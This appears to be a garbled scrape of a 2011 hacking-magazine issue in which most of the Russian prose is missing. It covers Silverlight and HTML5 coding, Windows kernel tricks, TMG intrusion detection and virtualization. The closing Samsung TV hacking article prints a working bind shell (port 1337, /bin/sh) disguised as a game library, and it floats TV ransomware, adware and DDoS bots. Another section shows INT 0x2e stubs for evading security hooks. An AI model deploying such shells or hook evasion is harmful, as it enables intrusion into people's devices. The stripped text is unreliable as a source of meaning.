3. Clipboard access 4.0 Silverlight
. ,
, .

Silverlight.
Silverlight isolated storage.
Silverlight
. Silverlight, ,

103

CODING


. 1 ,
.

- firewall Silverlight, , ,
, . SL ,
, ,
. Silverlight
, :
1. crossdomain.xml , Flash-:

Transparent
Silverlight-


Silverlight-
Transparent Code

<?xml version="1.0"?>
<cross-domain-policy>
<allow-http-request-headers-from domain="*"
headers="SOAPAction,Content-Type"/>
</cross-domain-policy>

SafeCritical Code

<?xml version="1.0" encoding="utf-8"?>


<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="SOAPAction">
<domain uri="*"/>
</allow-from>
<grant-to>
<resource path="/" include-subpaths="true"/>
</grant-to>
</policy>
</cross-domain-access>
</access-policy>

, <img> HTML, Image Media Silverlight



. - SL-, ,
. HTTP-, Silverlight
TCP/UDP-. ,
,
.
, TCP/
UDP- 4502-4534. . Silverlight- .

Silverlight
out of browser inbrowser-
Silverlight, ,
install Silverlight.
, SL- sandboxed,
trusted. Silverlight
, Silverligt-,
:
25 ;
( -trusted
, click jacking ,
- , ).
trusted-,

104

Silverlight Code

2. clientaccesspolicy.xml ,
Silverlight:

SecurityCritical Code

:
COM-;
/ ;
.
trusted Silverlight-
, , , ,
.


Silverlight-

JavaScript + HTML, Silverlight cross site scripting (XSS) ,


, -. XSS ,
-.
XSS HTML/JavaScript- , .
XSS- Silverlight- ,
, HTML/JavaScript.
XSS - , HTML. Silverlight- HTML-
XAML- , ,

mybox.Text = badString;

XamlReader.Load("<TextBlock.Text= " + badString + "/>".


X 06 /149/ 2011

http://foo.com

http://api.cool.com
http://foo.com/app.xap

, XSS- , SL- :
XamlReader.Load() ;
Assembly.Load() c Dll, ;
SL-
XAML- HTML- System.Windows.Browser;
SL- xap-
.
xap- . Silverlight-
, managed- , native-.
.
, XSS GIFAR-,
- ,
Silverlight , Silverlight-
Silverlight-
MIME Type application/x-silverlight-app.
, , .xap-
heap-spray ,
. native-,
, xap-, heap-spray
web-.

Silverlight-
?

Silverlight-,
, EnableHtmlAccess object,
Silverlight-. ,
SL- HTML- JavaScript.
true,
X 06 /149/ 2011

, false .
, Silverlight-
,
:
if (App.Current.Host.Settings.EnableHTMLAccess == false)
throw new Exception();
string htmlurl = System.Windows.Browser.HtmlPage.Document.
DocumentUri.ToString();
if (htmlurl != "http://my.com/my.html")
throw new Exception();

Silverlight- ,
:
(, )
Silverlight-, , , SQL ;
-
( referer Silverlight 4.0).
, . , IS
. , IS
. , -
DNS , .
IS XSS .

Silverlight- , , , , .
Silverlight-, ,
web-
. z

105

CODING

HTML5
HTML5

, ?
,
HTML5.
HTML5-,
.
HTML5?

HTML5 .
. HTML5 CSS3
,
web- .
JavaScript. API,
HTML5. , : HTML5
/ (JS, HTML5, CSS3 ),
web-.

HTML5 .
2007 .
W3C. HTML5
Web Application 1.0,
2004 . HTML5
, .
HTML5
22 2008 . ,
.
. , (FireFox

106

4, Google Chrome 10, IE9, Opera 11)


.

HTML5 , , . , ,

. , .

1: Drag&Drop

(,
, . .)
HTML5 File API Drag and Drop API.

. ,
Browse?
, .
.
.
,
, X 06 /149/ 2011

?
,

HTML5.
. :
, HTML5
?. ,
JavaScript-
Modernizr (modernizr.com).
,
HTML5,
.
,
.
, ,
. Google
Chrome Internet Explorer 9. pr-
, Microsoft
, Google Chrome.

. ,

.
Drag&Drop
.
. ,
.
HTML5 , Drag&Drop .
Gmail. , ,
.
, .
: sample.html, style.css scripts.js. , ,
html-,
. HTML JS CSS.
, .
.
sample.html :
<!DOCTYPE html>
<html>
<head>
<link type="text/css" rel="stylesheet"
media="all" href="style.css" />
<script src="jquery.js" type="text/javascript"></script>
<script type="text/javascript" src="scripts.js"></script>
</head>
<body>
X 06 /149/ 2011

HTML5 FLASH
HTML5
. HTML5 CSS3.

Flash. ,
, Flash ,
HTML5/CSS3- (). ,
.

, .
, Canvasa: feedtank.
com/labs/html_canvas;
3D- Google:
addyosmani.com/resources/googlebox;
, .
.
. : mrdoob.
com/projects/chromeexperiments/ball_pool;
,
. : alteredqualia.
com/canvasmol;
-
? ,
. Google
WebGL, HTML5, CSS3 Flash.
, 3D- ,
.
. :
bodybrowser.googlelabs.com.

<div id="box"><span id="label"> </span>


</div>
</body>
</html>

JavaScript
jquery. html-.
,
.
div-. ,
.
, CSS.
style.css :
#box {
width: 500px;
height: 300px;
border: 2px dashed #000000;
background-color: #FCFFB2;
text-align: center;
color: #3D91FF;
font-size: 2em;
font-family: Verdana, sans-serif;

107

CODING

HTML5

-moz-border-radius: 8px;
-webkit-border-radius: 8px;
}
#label {
position: relative;
top: 2%;
}

box
(
). ,
dashed
. ,
: -moz-border-radius -webkitborder-radius.
.
- , .
web-, .
JavaScript:
$(document).ready(function() {
//
var mybox = document.getElementById("box")
mybox.addEventListener("dragenter", dragEnter, false);
mybox.addEventListener("dragexit", dragExit, false);
mybox.addEventListener("dragover", dragOver, false);
mybox.addEventListener("drop", drop, false);
});
function dragEnter(evt) {
evt.stopPropagation();
evt.preventDefault();
}
function dragExit(evt) {
evt.stopPropagation();
evt.preventDefault();
}
function dragOver(evt) {
evt.stopPropagation();
evt.preventDefault();
}
function drop(evt) {
evt.stopPropagation();
evt.preventDefault();
var files = evt.dataTransfer.files;
var count = files.length;
if (count > 0)

108

handleFiles(files);
}
function handleFiles(files) {
//
//
//,
var file = files[0];
document.getElementById("label").innerHTML =
": " + file.name;
var reader = new FileReader();
reader.onprogress = handleReaderProgress;
reader.readAsDataURL(file);
}
function handleReaderProgress(evt) {
if (evt.lengthComputable) {
if (evt.loaded = evt.total) {
alert("...");
}
}
}

,
, JavaScript jquery,
. ,
. . , dragExit ,
,
.
, handleFiles().
(files[0])
. ,
.
, files. handleFiles() .
label (
?) , ,
FileReader(). :
html5rocks.com/tutorials/file/dndfiles.
onProgress FileReader().
, . :
, , , .

2: , ,

HTML5 web
flash-. ,
. X 06 /149/ 2011

GAPI.
:


( Flash Player )
. HTML5
- -.
, , <audio>
<video>. -
. , . ,
, ,
Chrome,
FireFox . ,
Flash-. (, - ,
- . ) ,
.
:
<!DOCTYPE html>
<html><body><video src="video-for-sample-1.mp4"
poster="screen-for-sample1.jpg" controls>
. ,
.
</video></body></html>

, <video>
poster. ,
.
? , /.
<audio> .
. ,
(ogg,
mp3). mp3,
ogg. ,
, .

3: Where are you now


(geolocation API)

Geolocation API .
, , Google Maps. ? ! ,
Twitter Geolocation
API web- -.
,
, .
, : GAPI ?. ,
- .
IP-, Wi-Fi , GPS (
), GSM cell ID .
, ][
Step , , .
X 06 /149/ 2011

<!DOCTYPE html>
<html>
<body>
<script language="JavaScript">
if (navigator.geolocation) {
navigator.geolocation.getCurrentPosition(
function (position) {
document.getElementById("latitude").innerHTML =
position.coords.latitude;
document.getElementById("longitude").innerHTML =
position.coords.longitude;
},
);
}
</script>
<div id="coords">: <span id="latitude">Unknown</span>
<br />: <span id="longitude">Unknown</span><br />
</div>
</body>
</html>

, ,
GAPI. geolocation true,
. getGurrentPosition
navigator. , .

4:

web-
. MySQL, SQLite , . HTML SQLite . !
, ?
, . , .
.
, .
, IE9 FF4 , Google Chrome.
,
:
this.db = openDatabase("xakep", "1.0", "test", 8192);
tx.executeSql("create mytable if not exists " +
"checkins(id integer primary key asc, field_number_one string)",
[], function() { console.log(" "); });
);

,
,
, SQLite: ,
.

HTML5.Shutdown()

HTML5 . ,
.
, HTML5-
. ,
, ,
. ( ).
,
. ! z

109

CODING
(stannic.man@gmail.com)

,

TLS

, , . !
(
:)), .

#1,
El pueblo unido jamas sera vencido!

, ? Windows
( ) , ,
, .
.

Windows ******, . ,
,
, ,
. WinAPI- RtlAdjustPrivilege,
AdjustTokenPrivileges . , WinAPI
ExitWindowsEx() ,
, ( ):
VOID sutdownSystem()
{
if (!OpenProcessToken(GetCurrentProcess(),
TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken))
{...}
LookupPrivilegeValue(NULL, SE_SHUTDOWN_NAME,
&tkp.Privileges[0].Luid);
tkp.PrivilegeCount = 1;
tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
AdjustTokenPrivileges(hToken, FALSE, &tkp, 0,
(PTOKEN_PRIVILEGES)NULL, 0);
if (!ExitWindowsEx(...))
{...}
}

, Windows (
) , ,
: -

110

!

( ) , . , Windows Vista
.
.
, , ,
? :). , :
, , . , , , , ,
.
?, . , , . ,
!
, ,
kernel32.dll ntdll.dll, . , kernel32.
dll ntdll.dll . ,
: kernel32!CreateFileW
ntdll!NtCreateFile [ INT 0x2e] ntos!ZwCreateFile (...).
,
Nt*-
INT 0x2e
kernel32!CreateFileW ntdll!NtCreateFile. , ,
INT 0x2e, .
,
! , INT 0x2e
Windows 2000. WinXP SYSENTER, INT 0x2e
.
, , :
__declspec(naked) NTSTATUS __cdecl NtCallStub(
__in ULONG SdtNumberOfFunc, ...)
X 06 /149/ 2011

{
__asm
{
mov eax, [esp+4]
lea edx, [esp+8]
int 0x2e
ret
}
}
// SdtNumberOfFunc Nt*-
// SSDT


NT*- RtlAdjustPrivilege. ?
. , x64- ,
SYSENTER (,
,
SYSENTER).
INT 0x2e :

. , , -
WinAPI NtCreateKey().
ntdll.dll, (,
). ,
, NtCreateKey X 06 /149/ 2011

INT 0x2e .
ZwCreateKey,
. ,
ntdll.dll!NtCreateKey,
. - , , NtCreateKey, ,
- ,
.
, ,
ntdll.dll!NtCreateKey INT 0x2e. ,
-,
, -
API NtCreateKey()
,
.
,
INT
0x2e ( SYSENTER).
, .

#2,

,
( ,
, )
,

DVD
dvd
DVD

,

.

HTTP://WWW
links
ReactOS
(
Windows):
alex-ionescu.com

111

CODING

.
,
JUMP --.
if( threadHandle = OpenThread(THREAD_GET_CONTEXT, FALSE,
currThreadEntry.th32ThreadID ) )
{
StartAddress = GetThreadStartAddress( threadHandle );
if( ( StartAddress < 0x00401000 ||
StartAddress > 0x0040156B ) && StartAddress < 0x70000000 )
{
//
}
else
{
NtGetContextThread( threadHandle, &ctx );
if( ( ctx.Eip < 0x00401000 || ctx.Eip > 0x0040156B )
&& ctx.Eip < 0x70000000 )
//
}
NtClose( threadHandle );
}

NtGetContextThread
INT 0x2e .
, ,
. , ,
INT 0x2e.

#3
malloc/realloc

, malloc ExAllocatePool,
, realloc .

112

? malloc/realloc,
ExAllocatePoolWithTag (
ExAllocatePool, MSDN, ,
ExAllocatePoolWithTag).
VOID * malloc(ULONG size)
{
PVOID data = 0;
data = ExAllocatePoolWithTag(PagedPool, size, "Tag");
memset(data, 0x0, size);
return data;
}

, , realloc:
VOID * realloc(PVOID memPtr, ULONG size, ULONG oldSize)
{
PVOID newPtr = 0;
newPtr = ExAllocatePoolWithTag(PagedPool, size, "Tag");
if( !newPtr )
return 0;
if ((oldSize) && (memPtr))
{
RtlMoveMemory( newPtr, memPtr, oldSize);
ExFreePool(memPtr);
}
return newPtr;
}

, , ,
, , .
! z
X 06 /149/ 2011

SYN/ACK

TMG 2010

TMG, NIS, GAPA


, . ,
, .
.


, .
, TMG 2010.

TMG 2010

ISA 2006 TMG (Threat Management Gateway) 2010


Forefront, . TMG

. TMG 2010 , VPN,

URL-.
ISA? TMG 64- ,
Windows Server 2003 . TMG .
TMG ,
, ISA 2006,
, ,
(. 1).
, web-
(. 2). Web
Access Policy HTTPS.
SSL-, SSL bridging. HTTPS inspection (. 2)
,
Man-in-the-middle.
(HTTPS inspection
certificate),
. HTTPS inspection SSTP-
.
, HTTPS inspection
Extended Validation (EV) SSL,

114


.
E-Mail Policy -
.
SSTP.

(. 3), IP- ,
Behavioral
Intrusion Detection (. 4). ISA 2006 IPv6 TMG
Direct Access.
SIP (Session Initiation Protocol). ,
Intrusion Prevention System
Network Inspection
System (NIS).

(Intrusion-Detection System
IDS) ( ), ,
,
.
(Intrusion Prevention Systems IPS),
IDS, ,
.
IDPS , ,
. IDPS (Network Based IDPS
NIDPS)
. IDPS (Host Based
IDPS HIDPS) (
), ,
.
IDPS ,
. Anomaly Based IDPS Policy Based IDPS
,
X 06 /149/ 2011

TMG
NIS
GAPA

1. NIS Guide to Configuring, Monitoring, and Troubleshooting the Network Inspection System (NIS)
in Forefront Threat Management Gateway (TMG) 2010:
download.microsoft.com;
2. ,
NIS:
technet.microsoft.com/en-us/library/ff382649.aspx;
3. GAPA GAPAL,
:
research.microsoft.com/pubs/70223/tr-2005-133.pdf;
4.
Forefront Edge:
technet.microsoft.com/en-us/library/cc891502.aspx;
5. Microsoft Malware Protection Center (MMPC):
microsoft.com/security/portal;
6. SDK TMG 2010:
microsoft.com/downloads/en/details.aspx?displaylang=en&Family
ID=8809cfda-2ee1-4e67-b993-6f9a20e08607.

, IT-Academy
& Softline
Microsoft Certified Professional (MCP)
Microsoft Certified Systems Administrator:
Security (MCSA: Security)
Microsoft Certified Systems Engineer: Security
(MCSE: Security)
Microsoft Certified Technology Specialist: Windows Server 2008
Active Directory, Configuration; Windows Server 2008 Network
Infrastructure, Configuration
Microsoft Certified Trainer (MCT)
Oracle Certified Associate (OSA)
Oracle Certified Professional (OCP)


, . 80%
,
, .

Network Inspection System (NIS)

NIS Generic Application


Level Protocol Analyzer (GAPA), Microsoft Research
(MSR). GAPA
GAPA Language (GAPAL),
.
NIS (IDS) . IDPS (, ++), GAPA

.
NIS IPS,
. , X 06 /149/ 2011

, ,
. ,
, ,
,
.
, NIS
. ,
NIS ,
Microsoft. , NIS
web-, .
TMG Malware Inspection.
NIS : HTTP, DNS,
SMB, MSRPC, SMTP, POP3, IMAP, MIME.

, . ,
,
(. 5). , ,
NIS User
Defined Protocol ,

115

SYN/ACK

. 1. Forefront TMG Management


NIS. NIS ,
Firewall policy.
, (.
6). Allow, to avoid blocking legitimate
traffic , ,
.
,
.
RFC,
Block, to tighten
security.

NIS

TMG 2010 .
Preparation Tool, (, .Net Framework 3.5.1),
Installation Wizard. ,
Getting Started Wizard, No
network adapters could be identified.
, - TMG
. Security
Configuration Wizard (SCW), TMG 2010.
NIS Getting Started Wizard,
Roles Configuration. . 7 ,
NIS . NIS
(. 6).
NIS. NIS
, 30%
. ,
. ,
, ,
. NIS. ,
Domain Name Set, http-.

116

. 2. Web Access Policy


NIS Properties
.
NIS, Other.
Test. Test:Win/NIS.HTTP.Signature!0000-0000 , SecureNAT
TMG, http://www.contoso.com/testNIS.
aspx?testValue=1!2@34$5%6^[{NIS-Test-URL}]1!2@34$5%6^.
NIS
(12234). SMB.
Malware Protection
Center, Details
.

(. 8).
,
NIS.
Firewall Policy (. 9).
X 06 /149/ 2011

. 4. Behavioral Intrusion Detection

. 3.

NIS

: vulnerability based ( ), exploit based ( ) policy


based ( ,
).

. ,
, ,
, .
,
Microsoft Malware Protection Center (MMPC). MMPC , Telemetry Service.
Forefront TMG . Basic
Membership Microsoft
, .
Advanced Membership
URL, .
NIS Properties
Definition Updates, : ( ),
.
, , . Automatic polling
frequency NIS,
TMG Update Center.

,
, VPN. NIS Properties
Response policy .
Microsoft default policy,
, MMPC.
:
(Detect only response), (No response Disable signature). NIS
X 06 /149/ 2011

.5. Network Inspection System


, . Definition
Updates Version Control.
.
.
. ,
, . , . :
Attention Required, Response, Policy Type, Business Impact, Category,
Date Published, Severity, Fidelity, Protocol Status.
.
, , HTTP,
RPC over HTTP. ,
, ,
. ,
, ,
Microsoft Default Policy,
. ,
, NIS
.
(Detect Block) NIS
IDS IPS.
, .

117

SYN/ACK

. 6.

. 8. NIS

. 9. NIS

.



Detect only Forefront TMG Customer Support.
, -
.
MMPC , Telemetry
Service. ,
.

. 7. NIS

118

NIS, , . :
. z
X 06 /149/ 2011

SYN/ACK
grinder (grinder@tux.in.ua)

.
, .
, .

VMware ESXi

, , VMware, . VMware
Workstation VMware Player. MS
Virtual PC Workstation.
- ,
.
VMware ESXi ,
, VMware vSphere (
, . ][ 08.2010). , ESXi
Linux, (VMkernel)
: vCLI (vSphere CLI), PowerCLI (PowerShell
vCLI), SSH DCUI (Direct Console User Interface).
ESXi
VMware,
ESX. ESX , VMware
VSphere ESXi ( VMware vSphere
Hypervisor), ESX ESXi .
ESXi.
ESXi ESX .
ESX Linux, . VMware
COS (Console OS),
. : ~2
350 ESXi ( 70).
ESXi VMkernel,
(, )
.
, .

firmware . -
ESXi (clck.ru/9xlp) ,
ESX, ,
. ,
ESXi Whitebox HCL (clck.
ru/9xnD), VMware ESXi.
,
.
VMware
. Windows, Linux, Solaris,
FreeBSD, Netware , .
ESXi
ESX Active Directory
( ),
(

120

),
VMware vStorage VMFS/Storage VMotion SAN,
, VMsafe Security
API. CPU, , (
).
(
PXE), 4.1 ,
, vCenter Server. VSphere API
ESXi.
VMware
vCenter Converter (vmware.com/products/datacentervirtualization/converter), ESXi
MS Virtual Server, Virtual PC, Hyper-V,
, Acronis True Image, Norton Ghost .
, ESXi
- VMware Go (go.vmware.com), , ESXi
VM.

MS Hyper-V

MS,
2008 . Win2k8R2 Hyper-V
Live Migration, ,
.
Hyper-V
Ring-1.
, . Windows
Server 2k8/R2 ( Server Core)
MS
Hyper-V Server 2008 R2 (microsoft.com/hyper-v-server).
( Client Access License),
Windows. ,
Server Core,
( )
.
, Hyper-V
, .
Live Migration, .
, MS Hyper-V Server,
1 8 CPU, .
32- 64- Windows
XP SP3, Vista SP2/2k3 SP1/2k8 Linux (SLES RHEL). ,
X 06 /149/ 2011

XenServer
XenServer ( 5.6.1) - VMware
ESXi. ,
.
XenCenter,
Citrix.
XenServer .
;
Live Motion; ,
;
(RBAC) Active Directory;
,
RAM VM .
,
,
.
(High
Availability). ,
, .

( , NAS, SAN ).
VMWare VMDK,
MS VHD, VDI, WIM.

Windows, Win2k SP4, Linux (SLES, RHEL/CentOS, Oracle EL, Solaris, Debian).
64 , 256 16
.
, VM

: , , .

X 06 /149/ 2011

*nix Ubuntu, FreeBSD


.
Linux 2.6.32+, Hyper-V
(LinuxIC, MS GPL). ,
Win2k8 4 vCPU.
MS Hyper-V Server x64
CPU, Intel VT AMD-V, 1 RAM.

MS System Center Virtual Machine
Manager 2008 (SCVMM 2008), P2V(Physical to Virtual) V2V- ( VMware).
, P2V Win. , , Linux, : VMware vCenter Converter ESXi
SCVMM Hyper-V. ,
, .
,
. SCVMM
VMDK2VHD (vmtoolkit.com/files), Citrix
XenConvert, Quest vConverter (quest.com/vconverter).

OpenVZ

OpenVZ (OpenVZ.org)
Linux, (Virtual
Environments). , .
Linux.
, .

,
.
( 1-3%).

121

SYN/ACK

AQEMU
CentOS
64 RAM, 4096 CPU
.
(venet), VM
(IP ). , - (
,
) OpenVZ , ,
Linux.
.
( inodes / ),
, VM.
VM.
(Checkpointing),
. ,
.

(download.openvz.org/contrib/template/precreated),
.
OpenVZ vzctl (vzlist, vzmigrate, vzcalc, vzcfgvalidate, vzmemcheck,
vzcpucheck, vzpid, vzsplit ).
, , OpenVZ, KVM Xen ( ) WebVZ (webvz.sf.net), Kloxo ( Proxmox VE) HyperVM.
OpenVZ , Debian.

KVM

KVM (Kernel-based Virtual Machine)


RedHat
.
Intel VT AMD V. , KVM
:
CPU (, Intel Atom) .
,
. :
$ egrep '^flags.*(vmx|svm)' /proc/cpuinfo

GNU GPL, RedHt


Novell .
(kvm.ko) userspace.

122

OpenVZ
QEMU
(qemu.org), . CPU
kvm-amd.ko kvm-intel.ko. /dev/kvm.
,

. - , balloon (
) Virtio,
userspace. , OpenVZ, , , 20%. KVM Linux, *BSD,
Windows, Solaris, Mac OS X .
,
16 vCPU ( , Win XP,
). , ,
Linux,
, .
.
, KVM vmdk-,
VMWare, HOWTO (clck.ru/9xlp).
, KVM Linux
2.6.20 (, ),
.
KVM savevm/loadvm, offline ( migrate*).
( CPU) ,
.
X 06 /149/ 2011

INFO

info

ConVirt
Hyper-V
Win2k8
,
. :
, .
P2V .
dd, QEMU,
.
VMWare Converter.
KVM QEMU (
), (
, ) .
/dev/kvm kvm.
-
virt-manager, RedHat,
qemu* kvm.
(
).
: , Karesansui (Xen/KVM),
Symbolic, ConVirt (Xen/KVM), Ganeti (Xen/KVM).

Xen

90-,

, GNU GPL.
2007 .
XenSource,
Citrix,
Citrix XenServer (CentOS + Xen). , Xen Oracle VM.
Xen, .
Xen Cloud Platform.
Xen ,
()
(HVM, Hardware Virtual Machine)
(PV). , , CPU Intel-VT
AMD-V,
. , Xen
.

, Xen
: x86, x86_64, Itanium, Power PC ARM, Linux, NetBSD FreeBSD.
WinXP, X 06 /149/ 2011

VM Karesansui
. Linux, NetBSD,
FreeBSD, Solaris Windows.

, 8%. Live Migration, ,
,
, VM
(Remus Fault Tolerance), USB-.

,
( ).
4.1 > 255
CPU, 1 RAM, 128 vCPU;
CPU
.
vanilla Linux Xen 2.6.37,
Linux
.

xen-utils, xen-tools, . , ,
virt-manager, AQEMU, OpenQRM, Xen
Orchestra, Zentific, xnCORE .

.
,
.
, .
.
,
OpenSource, . z


VMware vSphere
,
][ 08.2010.
BSOD
Windows, ESXi
PSOD (Purple
Screen of Death).


MS
System Center Virtual
Machine Manager
2008.
Linux
2.6.32
Hyper-V.


, ][ 04.2010.
Citrix
XenServer

, ][
05.2009.

HTTP://WWW
links
VMware:
vmware.ru;
MS
Hyper-V Server 2008
R2: microsoft.com/
hyper-v-server;

OpenVZ: download.
openvz.org/contrib/
template/precreated.

123

SYN/ACK
, c Group-IB

-

.
.
, , .
:
, , ,
.


.
.
.
, , ,
, , . VMware ESX, Citrix
XenServer, Microsoft Hyper-V.
, : VMware Workstation, Oracle Virtual Box
.
,
.
,

(, ][).
,

.
,
(, ) .
, . ,
-,
.

VT-x? VT-d!


Intel. (VT-x)

. (VT-d)
,
,
-.
VT-d
,
.
. -

124

, , .

, .
? , ,
.
Citrix, Xen Client.
2010 ,
,
. ?
,
. .
, . .
,
( ),
,
.

,
.
,
, , , . ,
,
.
,
, , , , ,
,
. Xen Client , ,
citrix.com.

Xen Client . .
Intel VT-d,
Core i5-5xx Core i7,
Sandy Bridge Core i5-25xx.
3D- , ,
( . .),
Intel GMA X4500 Intel GMA HD.
X 06 /149/ 2011

Xen Client
, Xen Client

, , IDS- DLP-.
,
.

Xen Client
.

.
Windows
(XP-Seven),
Linux, Xen Tools. Mac
OS X .

,
.
, ,
. ,
.
ISO , Citrix Synchronizer.
, , .
,

, X 06 /149/ 2011

,
SynAsk

, , -, . ,
-
3-6 . . . . .
. . -
, , IT,
18:00,
,
.


. ?
, ,
,
- .

, ,
, , ;
.
, ,
,
:). .
, .

. .

. -

125

SYN/ACK

!

.
,
, . ,
. , .
.
, Citrix
Synchronizer. Synchronizer,
, ,
. ,
.

.
. ,
USB Wi-Fi. ,
.
, ,
. ,
Xen Client:
1.
, Enterprise-, .
2. .
3.
. ,
,
, ,
.
4. ,
, -

126


.
, , ,
, .

Xen Server ?
: Citrix Receiver. ,
(
, Android iOS). Citrix Receiver
. ,
, Desktop Delivery Controller,
.
Citrix VDA,
X 06 /149/ 2011


Desktop Delivery Controller,
,
. Citrix Receiver,
.
, Microsoft Office 2010
. ,
RDP?
Xen Server Xen
Desktop,
,
, .
Citrix
Citrix XenVault Citrix XenApp.

. ,
. Citrix
XenApp , . .
XenApp 1 ,
, ,
.
, ( ) ,

. Citrix XenVault , .
AES 256- , ,
.
.
. Xen Client, XenVault
, . ,

.

, ,
. ,
,
, .
X 06 /149/ 2011

XenClient
.

,

. .
, :
1.
.
2.
.
3. .
4. .
:
1. .
2. .
3. .

, Citrix. ,
(,
:) . .) ,
. ,

. z

127

PHREAKING
HellMilitia

, ,
.
Samsung LE650B.
GNU/Linux, BusyBox,
, .

,
.
: ,
.
, .

,
Ethernet-. ,
,
. ,
192.168.1.2, 192.168.1.1.
- .

128


nmap:
$ nmap -A 192.168.1.2
Nmap scan report for 192.168.1.2
Host is up (0.00019s latency).
All 1000 scanned ports on 192.168.1.2 are closed
MAC Address: 00:12:FB:89:50:3E (Samsung Electronics)
OS details: Linux 2.6.14 2.6.16, Linux 2.6.17 (Mandriva)

, ,
:).
TCP- . , UDP- ?
# nmap -sU 192.168.1.2
X 06 /149/ 2011


Nmapscanreportfor 192.168.1.2
Host is up (0.00021s latency).
Not shown: 997 closed ports
PORT
STATE
SERVICE
1024/udpopen|filtered unknown
1026/udpopen|filtered win-rpc
1900/udpopen|filteredupnp
MAC Address: 00:12:FB:89:50:3E (Samsung Electronics)

UPnP, -.
HTTP XML .
UPnP DLNA (Digital
Living Network Alliance) ,
- , Wi-Fi/Ethernet
DLNA-.
UPnP , .

GUI

,
:).
, , - ?
, .
:
Samsung
SDK . ,
, e .
, bindshell. Samsung
AppStore. , . :
xml- clmeta.dat manifest-, ; game.so
sharedlibrary, .
.
, :
$ file game.so
game.so: ELF 32-bit LSB shared object, ARM, version 1 (SYSV),
X 06 /149/ 2011


dynamically linked, not stripped

ARM! , .
, objdump,
Game_Main, , , . -
, ,
.
(FAT32) , ,
ContentLibrary. ContentLibrary:
, ,
. , .
-.
Bindshell , ,
sharedlibrary Game_Main().
-
#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#include <sys/socket.h>
#include <netinet/ip.h>
extern Game_Main;
void Game_Main()
{
int icmp_sock, shell_sock, cli;
struct sockaddr_in sin;
sin.sin_family = AF_INET;
sin.sin_addr.s_addr = INADDR_ANY;
sin.sin_port = htons(1337);
shell_sock = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
bind(shell_sock, (structsockaddr *)&sin, sizeof(sin));
listen(shell_sock, 1);
cli = accept(shell_sock, NULL, 0);
dup2 ( cli, 0 );
dup2 ( cli, 1 );

129

PHREAKING


,
,
. ,
3.5- . , -,
, RS-232.
:
.
1. .
2.
.
3. usb, (
usb-flash ): /lib/modules/rc.local.
NAND- rfs:
# insmod /lib/modules/fsr.ko
# insmod /lib/modules/rfs.ko
# insmod /lib/modules/fsr_stl.ko

, : bml.erase /dev/bml0/5.
, , : bml.restore /dev/bml0/5 /
dtv/usb/sd1/Image.img.
u-boot.

u-boot.
,
[INFO] [MENU] [MUTE] [POWER]. -


/dev/bml0/3
/dev/bml0/4
/dev/bml0/5
/dev/bml0/6
/dev/bml0/7

uboot_env.bin
fnw.bin
Image
rootfs.img
boot.img

Control Suboption Rs232 jack


Debug, Control Suboption Watchdog -

. ,

. -

u-boot.

, Hit any key to stop autoboot.

0, .

help.

e FAT32;

usb- : bbmusb.

/update;

e :

, kernelimage (4). ,
( Image),

/dev/bml0/1 onboot.bin
/dev/bml0/2 u-boot.bin

dup2 ( cli, 2 );
execl ( "/bin/sh", "sh", NULL );
}

:
arm-linux-gccbindshell.c -fPIC -shared -o game.so

130

. , .

-
game.so ( ) clmeta.dat
( ).

. -
X 06 /149/ 2011

mount


1337 . - :

, .
, ,
:

$ telnet 192.168.1.2 1337

, ,
busybox
. busybox, help, , vi.

mtd_*-:
flash-.
:
# cat /proc/version
[28_64_512] Linux version 2.6.18_SELP-ARM (ksh921@sp) (gcc
version 4.2.0 20070514 (GPL2) (SELP 4.2.0-3.0.5.custom 200710-31(14:53))) #81 PREEMPT Mon Jun 22 10:10:31 KST 2009

passwd:
# cat /etc/passwd
root::0:0:Root,,,:/:/bin/sh

# dmesg

:
<5>CPU: ARMv6-compatible processor [410fb767] revision 7
(ARMv6TEJ), cr=00c5387f
<4>Machine: Samsung-SDP83 Eval. Board(64bit 512MB)
<6>SDP83 Core Clock: 600.0Mhz
<6>SDP83 DDR2 Clock: 399.937Mhz

e : ARMv6 600Mhz, DRRII 400Mhz 512MB.


TEJ :
T: THUMB- . 16 ( 32).
.
E: Enhanced DSP instructions.
J: Jazelle DBX (Direct Bytecode eXecution) , ARM Java -. ,
- . -

df

X 06 /149/ 2011

131

PHREAKING

Java-.
, exeDSP .
:

:
$ unsquashfsrootfs.img

# lsmod
rt73
rt2870sta
usb_storage
ohci_hcd
ehci_hcd
usbcore
usb_fault
8139too
samdrv
rfs
fsr_stl
fsr

354092
674644
37796
18692
29992
129064
4380
23296
3875988
71688
251448
257756

0xbf531000
0xbf48b000
0xbf480000
0xbf47a000
0xbf471000
0xbf450000
0xbf44d000
0xbf446000
0xbf092000
0xbf07f000
0xbf040000
0xbf000000

: 2 Wi-Fi Samsung.
, . usb; ; samdrv
;
Samsung, fsr* .

mount, df /sbin/
update.sh,
:
/dev/tbml6, squashfs, ro, / ;
/dev/tbml7, squashfs, ro, /mtd_boot MinicomCtrl, ;
/dev/tbml8, rfs, ro, /mtd_exe ,
exeDSP, samdrv.ko,
;
/dev/tbml9 squashfs, ro, /mtd_appdata
;
/mtd_tlib MediaContent , ;
/mtd_down ;
/dtv/usb/sd* usb-flash.
, : squashfs rfs. Squashfs
ReadOnly,

, ,
.
, . :
# cat /dev/tbml6 > /dtv/usb/sda/rootfs.img

,
. , :
/mtd_exe/GAME_LIB/ SDL-,
\;
/mtd_exe/InfoLink/keyconfig ,
;
/mtd_appdata/resourse (on.mp3), (off.mp3), (factory_reset_bell.
mp3) , (self.mp3).

132

/mtd_exe? RFS
FAT16, ,
:
$ mkdirmtd_exe
$ mount mtd_exe.img ./mtd_exe -o loop
$ ls -la mtd_exe


: ,
/ (/mtd_appdata/resourse)
(/mtd_exe/InfoLink/
keyconfig).

,
. , . ,
? :
1.
Winlock. ,
SMS,
.
, .
: ,
sms XXXX. ,
.
2.
adware, ,
.
3. DDoS/-

Linux. , ,
, DDoS- .
, . :
.
SDL.
.
RO-, .
.
, game.so, wrapper
, ,
.
, . ,
fork 2 : ,
. :
#define VIDEO_X
#define VIDEO_Y
#define VIDEO_BPP

1920
1080
32
X 06 /149/ 2011

UPnP-Inspector
#define SCREEN_FLAGS

return 0;
}
SDL_BlitSurface(image, NULL, screen, NULL);
return 1;

...
flog = fopen("/dev/kmsg", "a+");
...
}
int init_video(void)
{
